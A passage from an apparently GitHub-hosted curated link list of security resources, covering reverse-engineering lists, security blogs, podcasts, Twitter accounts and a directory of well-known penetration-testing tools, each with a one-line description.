href="https://github.com/infosecn1nja/Red-Teaming-Toolkit"><b>Red-Teaming-Toolkit</b></a> - a collection of open source and commercial tools that aid in red team operations.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/snoopysecurity/awesome-burp-extensions"><b>awesome-burp-extensions</b></a> - a curated list of amazingly awesome Burp Extensions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Free-Security-eBooks"><b>Free Security eBooks</b></a> - list of a Free Security and Hacking eBooks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yeahhub/Hacking-Security-Ebooks"><b>Hacking-Security-Ebooks</b></a> - top 100 Hacking & Security E-Books.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nikitavoloboev/privacy-respecting"><b>privacy-respecting</b></a> - curated list of privacy respecting services and software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wtsxDev/reverse-engineering"><b>reverse-engineering</b></a> - list of awesome reverse engineering resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/michalmalik/linux-re-101"><b>linux-re-101</b></a> - a collection of resources for linux reverse engineering.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/onethawt/reverseengineering-reading-list"><b>reverseengineering-reading-list</b></a> - a list of Reverse Engineering articles, books, and papers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/0xInfection/Awesome-WAF"><b>Awesome-WAF</b></a> - a curated list of awesome web-app firewall (WAF) stuff.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>awesome-shodan-queries</b></a> - interesting, funny, and depressing search queries to plug into shodan.io.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danielmiessler/RobotsDisallowed"><b>RobotsDisallowed</b></a> - a curated list of the most common and most interesting robots.txt disallowed directories.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kayzaks/HackingNeuralNetworks"><b>HackingNeuralNetworks</b></a> - is a small course on exploiting and defending neural networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/7e5cad8c0726fd6a5e90360a754fc568"><b>wildcard-certificates</b></a> - why you probably shouldn't use a wildcard certificate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/5a9909939e6ce7d09e29"><b>Don't use VPN services</b></a> - which is what every third-party "VPN provider" does.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/InQuest/awesome-yara"><b>awesome-yara</b></a> - a curated list of awesome YARA rules, tools, and people.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/drduh/macOS-Security-and-Privacy-Guide"><b>macOS-Security-and-Privacy-Guide</b></a> - guide to securing and improving privacy on macOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/PaulSec/awesome-sec-talks"><b>awesome-sec-talks</b></a> - is a collected list of awesome security talks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/k4m4/movies-for-hackers"><b>Movies for Hackers</b></a> - list of movies every hacker & cyberpunk must watch.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cheatography.com/"><b>Cheatography</b></a> - over 3,000 free cheat sheets, revision aids and quick references.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mre/awesome-static-analysis"><b>awesome-static-analysis</b></a> - static analysis tools for all programming languages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ossu/computer-science"><b>computer-science</b></a> - path to a free self-taught education in Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danluu/post-mortems"><b>post-mortems</b></a> - is a collection of postmortems (config errors, hardware failures, and more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danistefanovic/build-your-own-x"><b>build-your-own-x</b></a> - build your own (insert technology here).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rby90/Project-Based-Tutorials-in-C"><b>Project-Based-Tutorials-in-C</b></a> - is a curated list of project-based tutorials in C.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kylelobo/The-Documentation-Compendium"><b>The-Documentation-Compendium</b></a> - various README templates & tips on writing high-quality documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mahmoud/awesome-python-applications"><b>awesome-python-applications</b></a> - free software that works great, and also happens to be open-source Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/awesomedata/awesome-public-datasets"><b>awesome-public-datasets</b></a> - a topic-centric list of HQ open datasets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Sahith02/machine-learning-algorithms"><b>machine-learning-algorithms</b></a> - a curated list of all machine learning algorithms and concepts.<br> </p> #### Blogs/Podcasts/Videos &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=nAFpkV5-vuI"><b>Varnish for PHP developers</b></a> - very interesting presentation of Varnish by Mattias Geniar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=CZ3wIuvmHeM"><b>A Netflix Guide to Microservices</b></a> - alks about the chaotic and vibrant world of microservices at Netflix.<br> </p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=yOyaJXpAYZQ"><b>Comparing C to machine lang</b></a> - compare a simple C app with the compiled machine code of that program.<br> </p> ##### :black_small_square: Geeky Persons <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/"><b>Brendan Gregg's Blog</b></a> - is an industry expert in computing performance and cloud computing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gynvael.coldwind.pl/"><b>Gynvael "GynDream" Coldwind</b></a> - is a IT security engineer at Google.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/"><b>Michaล‚ "lcamtuf" Zalewski</b></a> - white hat hacker, computer security expert.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ma.ttias.be/"><b>Mattias Geniar</b></a> - developer, sysadmin, blogger, podcaster and public speaker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/"><b>Nick Craver</b></a> - software developer and systems administrator for Stack Exchange.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scotthelme.co.uk/"><b>Scott Helme</b></a> - security researcher, international speaker and founder of securityheaders.com and report-uri.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krebsonsecurity.com/"><b>Brian Krebs</b></a> - The Washington Post and now an Independent investigative journalist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.schneier.com/"><b>Bruce Schneier</b></a> - is an internationally renowned security technologist, called a "security guru".<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chrissymorgan.co.uk/"><b>Chrissy Morgan</b></a> - advocate of practical learning, Chrissy also takes part in bug bounty programs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.zsec.uk/"><b>Andy Gill</b></a> - is a hacker at heart who works as a senior penetration tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://danielmiessler.com/"><b>Daniel Miessler</b></a> - cybersecurity expert and writer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://samy.pl/"><b>Samy Kamkar</b></a> - is an American privacy and security researcher, computer hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.j4vv4d.com/"><b>Javvad Malik</b></a> - is a security advocate at AlienVault, a blogger event speaker and industry commentator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.grahamcluley.com/"><b>Graham Cluley</b></a> - public speaker and independent computer security analyst.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.szurek.pl/"><b>Kacper Szurek</b></a> - detection engineer at ESET.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/"><b>Troy Hunt</b></a> - web security expert known for public education and outreach on security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://raymii.org/s/index.html"><b>raymii.org</b></a> - sysadmin specializing in building high availability cloud environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robert.penz.name/"><b>Robert Penz</b></a> - IT security expert.<br> </p> ##### :black_small_square: Geeky Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-audit.com/"><b>Linux Audit</b></a> - the Linux security blog about auditing, hardening and compliance by Michael Boelen.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxsecurity.expert/"><b> Linux Security Expert</b></a> - trainings, howtos, checklists, security tools, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.grymoire.com/"><b>The Grymoire</b></a> - collection of useful incantations for wizards, be you computer wizards, magicians, or whatever.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.secjuice.com"><b>Secjuice</b></a> - is the only non-profit, independent and volunteer led publication in the information security space.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duo.com/decipher"><b>Decipher</b></a> - security news that informs and inspires.<br> </p> ##### :black_small_square: Geeky Vendor Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nakedsecurity.sophos.com/"><b>Sophos</b></a> - threat news room, giving you news, opinion, advice and research on computer security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tripwire.com/state-of-security/"><b>Tripwire State of Security</b></a> - blog featuring the latest news, trends and insights on current security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.malwarebytes.com/"><b>Malwarebytes Labs Blog</b></a> - security blog aims to provide insider news about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.trustedsec.com/category/articles/"><b>TrustedSec</b></a> - latest news, and trends about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog"><b>PortSwigger Web Security Blog</b></a> - about web app security vulns and top tips from our team of web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.alienvault.com/blogs"><b>AT&T Cybersecurity blog</b></a> - news on emerging threats and practical advice to simplify threat detection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thycotic.com/company/blog/"><b>Thycotic</b></a> - where CISOs and IT Admins come to learn about industry trends, IT security, and more.<br> </p> ##### :black_small_square: Geeky Cybersecurity Podcasts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://risky.biz/netcasts/risky-business/"><b>Risky Business</b></a> - is a weekly information security podcast featuring news and in-depth interviews.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vice.com/en_us/topic/cyber"><b>Cyber, by Motherboard</b></a> - stories, and focus on the ideas about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://podcasts.apple.com/gb/podcast/cybercrime-investigations/id1428801405"><b> Cybercrime Investigations</b></a> - podcast by Geoff White about cybercrimes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://themanyhats.club/tag/episodes/"><b>The many hats club</b></a> - featuring stories from a wide range of Infosec people (Whitehat, Greyhat and Blackhat).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darknetdiaries.com/"><b>Darknet Diaries</b></a> - true stories from the dark side of the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/playlist?list=PL423I_gHbWUXah3dmt_q_XNp0NlGAKjis"><b>OSINTCurious Webcasts</b></a> - is the investigative curiosity that helps people be successful in OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/user/SecurityWeeklyTV"><b>Security Weekly</b></a> - the latest information security and hacking news.<br> </p> ##### :black_small_square: Geeky Cybersecurity Video Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UCzvJStjySZVvOBsPl-Vgj0g"><b>rev3rse security</b></a> - offensive, binary exploitation, web app security, vulnerability, hardening, red team, blue team.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w"><b>LiveOverflow</b></a> - a lot more advanced topics than what is typically offered in paid online courses - but for free.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/infoseccynic"><b>J4vv4D</b></a> - the important information regarding our internet security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybertalks.co.uk/"><b> CyberTalks</b></a> - talks, interviews, and article about cybersecurity.<br> </p> ##### :black_small_square: Best Personal Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/blackroomsec"><b>@blackroomsec</b></a> - a white-hat hacker/pentester. Intergalactic Minesweeper Champion 1990.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/MarcoCiappelli"><b>@MarcoCiappelli</b></a> - Co-Founder @ITSPmagazine, at the intersection of IT security and society.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/binitamshah"><b>@binitamshah</b></a> - Linux Evangelist. Malwares. Kernel Dev. Security Enthusiast.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/joe_carson"><b>@joe_carson</b></a> - an InfoSec Professional and Tech Geek.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/mikko"><b>@mikko</b></a> - CRO at F-Secure, Reverse Engineer, TED Speaker, Supervillain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/esrtweet"><b>@esrtweet</b></a> - often referred to as ESR, is an American software developer, and open-source software advocate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/gynvael"><b>@gynvael</b></a> - security researcher/programmer, @DragonSectorCTF founder/player, technical streamer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/x0rz"><b>@x0rz</b></a> - Security Researcher & Cyber Observer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hasherezade"><b>@hasherezade</b></a> - programmer, malware analyst. Author of PEbear, PEsieve, libPeConv.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TinkerSec"><b>@TinkerSec</b></a> - tinkerer, cypherpunk, hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/alisaesage"><b>@alisaesage</b></a> - independent hacker and researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/SwiftOnSecurity"><b>@SwiftOnSecurity</b></a> - systems security, industrial safety, sysadmin, author of decentsecurity.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/dakami"><b>@dakami</b></a> - is one of just seven people with the authority to restore the DNS root keys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/samykamkar"><b>@samykamkar</b></a> - is a famous "grey hat" hacker, security researcher, creator of the MySpace "Samy" worm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/securityweekly"><b>@securityweekly</b></a> - founder & CTO of Security Weekly podcast network.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/jack_daniel"><b>@jack_daniel</b></a> - @SecurityBSides co-founder.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/thegrugq"><b>@thegrugq</b></a> - Security Researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/matthew_d_green"><b>@matthew_d_green</b></a> - a cryptographer and professor at Johns Hopkins University.<br> </p> ##### :black_small_square: Best Commercial Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/haveibeenpwned"><b>@haveibeenpwned</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/bugcrowd"><b>@bugcrowd</b></a> - trusted by more of the Fortune 500 than any other crowdsourced security platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Malwarebytes"><b>@Malwarebytes</b></a> - most trusted security company. Unmatched threat visibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/sansforensics"><b>@sansforensics</b></a> - the world's leading Digital Forensics and Incident Response provider.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/attcyber"><b>@attcyber</b></a> - AT&T Cybersecurityโ€™s Edge-to-Edge technologies provide threat intelligence, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TheManyHatsClub"><b>@TheManyHatsClub</b></a> - an information security focused podcast and group of individuals from all walks of life.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hedgehogsec"><b>@hedgehogsec</b></a> - Hedgehog Cyber. Gibraltar and Manchester's top boutique information security firm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/NCSC"><b>@NCSC</b></a> - the National Cyber Security Centre. Helping to make the UK the safest place to live and work online.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Synacktiv"><b>@Synacktiv</b></a> - IT security experts.<br> </p> ##### :black_small_square: A piece of history <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ftp.arl.army.mil/~mike/howto/"><b>How to Do Things at ARL</b></a> - how to configure modems, scan images, record CD-ROMs, and other.<b>*</b><br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=3QnD2c4Xovk"><b>Diffie-Hellman Key Exchange (short version)</b></a> - how Diffie-Hellman Key Exchange worked.<br> </p> #### Hacking/Penetration Testing &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Pentesters arsenal tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.syhunt.com/sandcat/"><b>Sandcat Browser</b></a> - a penetration-oriented browser with plenty of advanced functionality already built in.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.metasploit.com/"><b>Metasploit</b></a> - tool and framework for pentesting system, web and many more, contains a lot a ready to use exploit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/burp"><b>Burp Suite</b></a> - tool for testing web app security, intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project"><b>OWASP Zed Attack Proxy</b></a> - intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://w3af.org/"><b>w3af</b></a> - is a Web Application Attack and Audit Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mitmproxy.org/"><b>mitmproxy</b></a> - an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cirt.net/Nikto2"><b>Nikto2</b></a> - web server scanner which performs comprehensive tests against web servers for multiple items.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sqlmap.org/"><b>sqlmap</b></a> - tool that automates the process of detecting and exploiting SQL injection flaws.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/lanmaster53/recon-ng"><b>Recon-ng</b></a> - is a full-featured Web Reconnaissance framework written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Tib3rius/AutoRecon"><b>AutoRecon</b></a> - is a network reconnaissance tool which performs automated enumeration of services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.faradaysec.com/"><b>Faraday</b></a> - an Integrated Multiuser Pentest Environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/Photon"><b>Photon</b></a> - incredibly fast crawler designed for OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/XSStrike"><b>XSStrike</b></a> - most advanced XSS detection suite.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/1N3/Sn1per"><b>Sn1per</b></a> - automated pentest framework for offensive security experts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/future-architect/vuls"><b>vuls</b></a> - is an agent-less vulnerability scanner for Linux, FreeBSD, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/tsunami-security-scanner"><b>tsunami</b></a> - is a general purpose network security scanner with an extensible plugin system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/michenriksen/aquatone"><b>aquatone</b></a> - a tool for domain flyovers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GitHackTools/BillCipher"><b>BillCipher</b></a> - information gathering tool for a website or IP address.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Ekultek/WhatWaf"><b>WhatWaf</b></a> - detect and bypass web application firewalls and protection systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/Corsy"><b>Corsy</b></a> - CORS misconfiguration scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/evyatarmeged/Raccoon"><b>Raccoon</b></a> - is a high performance offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Nekmo/dirhunt"><b>dirhunt</b></a> - find web directories without bruteforce.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openwall.com/john/"><b>John The Ripper</b></a> - is a fast password cracker, currently available for many flavors of Unix, Windows, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashcat.net/hashcat/"><b>hashcat</b></a> - world's fastest and most advanced password recovery utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/p0f3/"><b>p0f</b></a> - is a tool to identify the players behind any incidental TCP/IP communications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/ssh_scan"><b>ssh_scan</b></a> - a prototype SSH configuration and policy scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/woj-ciech/LeakLooker"><b>LeakLooker</b></a> - find open databases - powered by Binaryedge.io<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/offensive-security/exploitdb"><b>exploitdb</b></a> - searchable archive from The Exploit Database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vulnersCom/getsploit"><b>getsploit</b></a> - is a command line utility for searching and downloading exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zardus/ctf-tools"><b>ctf-tools</b></a> - some setup scripts for security research tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Gallopsled/pwntools"><b>pwntools</b></a> - CTF framework and exploit development library.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/security-tools"><b>security-tools</b></a> - collection of small security tools created mostly in Python. CTFs, pentests and so on.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/leonteale/pentestpackage"><b>pentestpackage</b></a> - is a package of Pentest scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dloss/python-pentest-tools"><b>python-pentest-tools</b></a> - python tools for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/fuzzdb-project/fuzzdb"><b>fuzzdb</b></a> - dictionary of attack patterns and primitives for black-box application fault injection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/AFL"><b>AFL</b></a> - is a free software fuzzer maintained by Google.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/AFLplusplus/AFLplusplus"><b>AFL++</b></a> - is AFL with community patches.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/syzkaller"><b>syzkaller</b></a> - is an unsupervised, coverage-guided kernel fuzzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/pwndbg/pwndbg"><b>pwndbg</b></a> - exploit development and reverse engineering with GDB made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/longld/peda"><b>GDB PEDA</b></a> - Python Exploit Development Assistance for GDB.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hex-rays.com/products/ida/index.shtml"><b>IDA</b></a> - multi-processor disassembler and debugger useful for reverse engineering malware.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/radare/radare2"><b>radare2</b></a> - framework for reverse-engineering and analyzing binaries.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/threat9/routersploit"><b>routersploit</b></a> - exploitation framework for embedded devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NationalSecurityAgency/ghidra"><b>Ghidra</b></a> - is a software reverse engineering (SRE) framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/salesforce/vulnreport"><b>Vulnreport</b></a> - open-source pentesting management and automation platform by Salesforce Product Security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sc0tfree/mentalist"><b>Mentalist</b></a> - is a graphical tool for custom wordlist generation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/archerysec/archerysec"><b>archerysec</b></a> - vulnerability assessment and management helps to perform scans and manage vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/j3ssie/Osmedeus"><b>Osmedeus</b></a> - fully automated offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/beefproject/beef"><b>beef</b></a> - the browser exploitation framework project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NullArray/AutoSploit"><b>AutoSploit</b></a> - automated mass exploiter.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/VirusTotal/yara"><b>yara</b></a> - the pattern matching swiss knife.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a> - a little tool to play with Windows security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a> - hunt down social media accounts by username across social networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://owasp.org/www-project-threat-dragon/"><b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br> </p> ##### :black_small_square: Pentests bookmarks collection <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetration testing execution standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/Practice.html"><b>Pentests MindMap</b></a> - amazing mind map with vulnerable apps and systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/webapptest.html"><b>WebApps Security Tests MindMap</b></a> - incredible mind map for WebApps security tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://brutelogic.com.br/blog/"><b>Brute XSS</b></a> - master the art of Cross Site Scripting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><b>XSS cheat sheet</b></a> - contains many vectors that can help you bypass WAFs and filters.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/"><b>Offensive Security Bookmarks</b></a> - security bookmarks collection, all things that author need to pass OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets"><b>Awesome Pentest Cheat Sheets</b></a> - collection of the cheat sheets useful for pentesting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Awesome-Hacking"><b>Awesome Hacking by HackWithGithub</b></a> - awesome lists for hackers, pentesters and security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/carpedm20/awesome-hacking"><b>Awesome Hacking by carpedm20</b></a> - a curated list of awesome hacking tutorials, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vitalysim/Awesome-Hacking-Resources"><b>Awesome Hacking Resources</b></a> - collection of hacking/penetration testing resources to make you better.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/enaqx/awesome-pentest"><b>Awesome Pentest</b></a> - collection of awesome penetration testing resources, tools and other shiny things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/m4ll0k/Awesome-Hacking-Tools"><b>Awesome-Hacking-Tools</b></a> - is a curated list of awesome Hacking Tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ksanchezcld/Hacking_Cheat_Sheet"><b>Hacking Cheat Sheet</b></a> - author hacking and pentesting notes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/toolswatch/blackhat-arsenal-tools"><b>blackhat-arsenal-tools</b></a> - official Black Hat arsenal security tools repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon"><b>Penetration Testing and WebApp Cheat Sheets</b></a> - the complete list of Infosec related cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a 